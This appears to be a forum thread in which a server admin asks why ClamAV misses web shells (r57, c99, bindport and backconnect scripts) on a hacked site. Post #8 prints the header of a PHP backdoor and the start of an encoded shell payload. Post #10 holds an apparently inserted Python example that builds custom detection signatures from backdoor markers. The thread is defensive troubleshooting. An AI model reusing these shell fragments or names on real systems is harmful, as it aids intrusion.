
Thread: clamav clamscan is not detecting r57.php or c99

  1. #1
    Join Date
    Oct 2009
    Posts
    101

    clamav clamscan is not detecting r57.php or c99

    # ls
    400.shtml 401.shtml 403.shtml 404.shtml 500.shtml balls cgi-bin logo.gif index.html r57.php
    # pwd
    /usr/home/soylandor1/domains/somedomainn.org/public_html
    # clamscan -i

    ----------- SCAN SUMMARY -----------
    Known viruses: 1131677
    Engine version: 0.97.3
    Scanned directories: 1
    Scanned files: 8
    Infected files: 0
    Data scanned: 0.12 MB
    Data read: 0.06 MB (ratio 1.88:1)
    Time: 5.256 sec (0 m 5 s)
    # clamscan -i -r ./

    ----------- SCAN SUMMARY -----------
    Known viruses: 1131677
    Engine version: 0.97.3
    Scanned directories: 3
    Scanned files: 23
    Infected files: 0
    Data scanned: 0.14 MB
    Data read: 0.07 MB (ratio 1.89:1)
    Time: 5.226 sec (0 m 5 s)
    #
    # ls balls
    bd.pl c99sh_backconn.661.pl c99sh_bindport.329.pl c99sh_bindport.941.pl k1r4_backconn.682.pl k1r4_bindport.119.pl k1r4_bindport.536.pl k1r4_bindport.893.pl k1r4_bindport.968.pl
    c2.php c99sh_bindport.115.c c99sh_bindport.749.pl k1r4_backconn.409.pl k1r4_backconn.887.pl k1r4_bindport.493.pl k1r4_bindport.616.pl k1r4_bindport.939.pl
    #
    # cd balls
    # clamscan -i -r ./

    ----------- SCAN SUMMARY -----------
    Known viruses: 1131677
    Engine version: 0.97.3
    Scanned directories: 1
    Scanned files: 12
    Infected files: 0
    Data scanned: 0.02 MB
    Data read: 0.01 MB (ratio 2.00:1)
    Time: 5.274 sec (0 m 5 s)
    #
    Last edited by questions; 02-07-2012 at 07:53 PM.

  2. #2
    Join Date
    Apr 2005
    Location
    GMT +7.00
    Posts
    11,023
    With regards, Alex.

    Professional Server Management for web hosting companies and individuals
    Hourly Support, Disaster Recovery, Server Hardening, Monthly Subscription
    Directadmin installation and optimization

    Click here if you need a Linux Admin

  3. #3
    Join Date
    Oct 2009
    Posts
    101
    Yes, it should.

  4. #4
    Join Date
    Oct 2009
    Posts
    101
    Quote Originally Posted by zEitEr View Post
    I've got FreeBSD, and that script seems like it's a Linux script and kind of messy... I might try it if I can't get ClamAV to work.

  5. #5
    Join Date
    Apr 2005
    Location
    GMT +7.00
    Posts
    11,023
    If you manage to make ClamAV to detect web shells, please let me know, as I've never ever before been able to find them with ClamAV.
    With regards, Alex.

  6. #6
    Join Date
    Apr 2005
    Location
    GMT +7.00
    Posts
    11,023
    Quote Originally Posted by questions View Post
    and kind of messy...
    Which one?
    With regards, Alex.

  7. #7
    Join Date
    Aug 2008
    Posts
    4,697
    Turn on verbose then, so you can see exactly what it's checking. I have no problem scanning for c99 on any of my servers.

    Here is the shell script I run:

    Code:
    #!/bin/sh
    # Refresh the signature database first, then scan the whole filesystem.
    
    clear
    echo
    echo "Starting update process..."
    echo
    freshclam -v
    echo
    echo "Done."
    sleep 4
    clear
    echo
    echo "Starting scan process...This may take several hours...please be patient."
    echo
    # -i: report infected files only, -r: recurse. Skip the ClamAV port tree and the
    # /sys, /dev and /proc pseudo-filesystems, cap per-file size at 15M, log to /var/log/clamav.
    cd / && clamscan -ir --exclude-dir=^/usr/ports/security/clamav --exclude-dir=^/sys --exclude-dir=^/dev --exclude-dir=^/proc --detect-pua=no --max-filesize=15M --scan-mail=no --log=/var/log/clamav/scanlog.log
    echo
    echo "Done."
    echo
    Last edited by scsi; 02-08-2012 at 07:39 AM.

  8. #8
    Join Date
    Oct 2009
    Posts
    101
    # clamscan -r -i -v
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/cgi-bin/.htaccess
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/cgi-bin/foo.sh
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/cgi-bin/bd.pl
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/400.shtml
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/401.shtml
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/403.shtml
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/404.shtml
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/500.shtml
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/hblogo9.gif
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/index.html
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/r57.php
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/bd.pl
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/c2.php
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_bindport.968.pl
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_bindport.493.pl
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_bindport.939.pl
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_bindport.119.pl
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_bindport.893.pl
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_bindport.616.pl
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_bindport.536.pl
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_backconn.887.pl
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_backconn.409.pl
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_backconn.682.pl

    ----------- SCAN SUMMARY -----------
    Known viruses: 1131677
    Engine version: 0.97.3
    Scanned directories: 3
    Scanned files: 23
    Infected files: 0
    Data scanned: 0.14 MB
    Data read: 0.07 MB (ratio 1.89:1)
    Time: 11.030 sec (0 m 11 s)
    # cat ./balls/c2.php
    <?php
    // A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.com/ [3-15-2011]
    // This code is public domain and may be used in part or in full for any legal purpose. I would still appreciate a mention though .

    function isLinux($path)
    {
    return (substr($path,0,1)=="/" ? true : false);
    }
    function getSlashDir($isLinux)

    # cat r57.php
    666
    <?php /* WARNING: This file is protected encrypted via fud file no detecding. */
    $o="QAFzOzh3b3cNKAAAVi0oBpAAMAAAFSckJwAQAFK/9wCAJwCSAFIAAAknBZ8AAAYnBGEAQQVxAEAAsSQDzwAABScCwf79CLMDkAAwAQMD3wAABScC0SQAUwB0BCED3wAABCcDFiQAEj

  9. #9
    Join Date
    Oct 2009
    Posts
    101
    My Ubuntu desktop scans with an OK at the end, but my FreeBSD server has no OK at the end; perhaps the hacker broke the server/ClamAV (I just installed ClamAV again last night on both the server and the Ubuntu desktop).

    This is how my desktop looks when I scan with ClamAV:

    admin1@admin1:~$ clamscan .
    LibClamAV Warning: ***********************************************************
    LibClamAV Warning: *** This version of the ClamAV engine is outdated. ***
    LibClamAV Warning: *** DON'T PANIC! Read http://www.clamav.net/support/faq ***
    LibClamAV Warning: ***********************************************************
    LibClamAV Warning: ***********************************************************
    LibClamAV Warning: *** This version of the ClamAV engine is outdated. ***
    LibClamAV Warning: *** DON'T PANIC! Read http://www.clamav.net/support/faq ***
    LibClamAV Warning: ***********************************************************
    LibClamAV Warning: ***********************************************************
    LibClamAV Warning: *** This version of the ClamAV engine is outdated. ***
    LibClamAV Warning: *** DON'T PANIC! Read http://www.clamav.net/support/faq ***
    LibClamAV Warning: ***********************************************************
    ./.dvdriprc: OK
    ./.recently-used: OK
    ./.openme.prefs: OK
    ./.dmrc: OK
    ./.odbc.ini: Empty file
    ./.DCP Builder: OK
    ./examples.desktop: OK
    ./.profile: OK
    ./.xsession-errors.old: OK
    ./.libquicktime_codecs: OK
    ./.printer-groups.xml: OK
    ./.sudo_as_admin_successful: Empty file
    ./.gtk-bookmarks: OK
    ./.ICEauthority: OK
    ./.esd_auth: OK
    ./.bash_logout: OK
    ./.bashrc: OK
    ./.bash_history: OK
    ./.gtk-recordmydesktop: OK
    ./clamscanlog.txt: OK
    ./.gksu.lock: Empty file
    ./.pulse-cookie: OK
    ./clipdat2.rdf: OK
    ./.ufrawrc: OK
    ./.xsession-errors: OK
    ./.recently-used.xbel: OK

    ----------- SCAN SUMMARY -----------
    Known viruses: 1132278
    Engine version: 0.96.5
    Scanned directories: 1
    Scanned files: 24
    Infected files: 0
    Data scanned: 1.69 MB
    Data read: 0.91 MB (ratio 1.85:1)
    Time: 4.835 sec (0 m 4 s)

  10. #10
    Join Date
    Aug 2008
    Posts
    4,697
    They must not match any signature in the virus database, or your database is out of sync. Update the definitions with freshclam. If not, copy the files to your Ubuntu and see if they are caught.
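
    A clean result only means that none of the loaded signatures matched, so one defensive option when stock ClamAV misses a known web shell is to add your own signatures. The following is an added example, not code from this thread or from the ClamAV project: it builds a hash-based (.hdb) and a body-pattern (.ndb) signature from constructed stand-in files based on the text markers quoted in post #8, and runs clamscan with -d against only that custom database when clamscan is installed. Signature names and sample contents are my own choice.

```python
import hashlib
import os
import shutil
import subprocess
import tempfile

# Constructed stand-ins built from the markers quoted in post #8 (not the real shells).
SAMPLES = {
    "c2.php": b"<?php\n// A robust backdoor script made by Daniel Berliner\n",
    "r57.php": b"666\n<?php /* WARNING: This file is protected encrypted via fud file no detecding. */\n",
    "index.html": b"<html><body>hello</body></html>\n",  # clean control file
}
# Body markers for .ndb signatures; the names are our own choice (assumed, not official).
MARKERS = {
    "Custom.Webshell.C2": b"A robust backdoor script",
    "Custom.Webshell.R57enc": b"protected encrypted via fud",
}

def hdb_line(data, name):
    """.hdb entry md5:size:name - exact-file match, so only byte-identical copies hit."""
    return f"{hashlib.md5(data).hexdigest()}:{len(data)}:{name}"

def ndb_line(name, marker):
    """.ndb entry name:target:offset:hex; target 0 = any file, offset * = anywhere."""
    return f"{name}:0:*:{marker.hex()}"

def write_sigdb(sigdir, samples, markers):
    """Write custom.hdb and custom.ndb into sigdir; return the lines written."""
    hdb = [hdb_line(d, "Custom.Webshell." + n.split(".")[0]) for n, d in samples.items() if n.endswith(".php")]
    ndb = [ndb_line(n, m) for n, m in markers.items()]
    for fname, lines in (("custom.hdb", hdb), ("custom.ndb", ndb)):
        with open(os.path.join(sigdir, fname), "w") as f:
            f.write("\n".join(lines) + "\n")
    return hdb, ndb

def clamscan_with(sigdir, scandir):
    """Scan using only the custom database (-d); returns {path: verdict}, or None if clamscan is absent."""
    exe = shutil.which("clamscan")
    if exe is None:
        return None
    out = subprocess.run([exe, "--no-summary", "-r", "-d", sigdir, scandir],
                         capture_output=True, text=True).stdout
    return dict(l.rsplit(": ", 1) for l in out.splitlines() if ": " in l)

if __name__ == "__main__":
    tmp = tempfile.mkdtemp()
    sigdir, scandir = os.path.join(tmp, "sigs"), os.path.join(tmp, "public_html")
    os.makedirs(sigdir); os.makedirs(scandir)
    for fname, data in SAMPLES.items():
        with open(os.path.join(scandir, fname), "wb") as f: f.write(data)
    hdb, ndb = write_sigdb(sigdir, SAMPLES, MARKERS)
    print("\n".join(hdb + ndb))
    print(clamscan_with(sigdir, scandir) or "clamscan not installed; db written to " + sigdir)
```

ClamAV reports signatures loaded from a non-official database with an .UNOFFICIAL suffix, so expect verdicts like "Custom.Webshell.C2.UNOFFICIAL FOUND"; the .hdb entry stops matching as soon as a single byte of the file changes, which is why the .ndb marker is the more useful of the two.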

  11. #11
    Join Date
    Oct 2009
    Posts
    101
    You can see that my server has more viruses and a newer version than my desktop. I've seen many other examples of clamscan catching c99 and r57 on other forums. Some people say it will, some say it won't.
